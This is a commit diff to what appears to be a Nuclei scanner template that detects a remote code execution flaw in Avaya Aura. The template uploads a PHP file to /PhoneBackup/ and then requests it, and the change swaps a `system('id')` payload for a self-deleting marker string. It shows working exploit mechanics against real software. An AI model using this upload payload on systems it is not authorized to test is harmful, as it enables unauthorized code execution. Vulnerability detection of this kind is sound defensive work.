Update avaya-aura-rce.yaml
parent
f61c0edc78
commit
67338b772a
|
@ -26,7 +26,7 @@ http:
|
|||
User-Agent: AVAYA
|
||||
Connection: close
|
||||
|
||||
<?php system('id');
|
||||
<?php print('avaya-aura-rce');unlink(__FILE__);
|
||||
|
||||
- |
|
||||
GET /PhoneBackup/{{randstr}}.php HTTP/1.1
|
||||
|
@ -36,10 +36,10 @@ http:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
- type: word
|
||||
part: body_2
|
||||
regex:
|
||||
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
|
||||
words:
|
||||
- "avaya-aura-rce"
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
|
|
Loading…
Reference in New Issue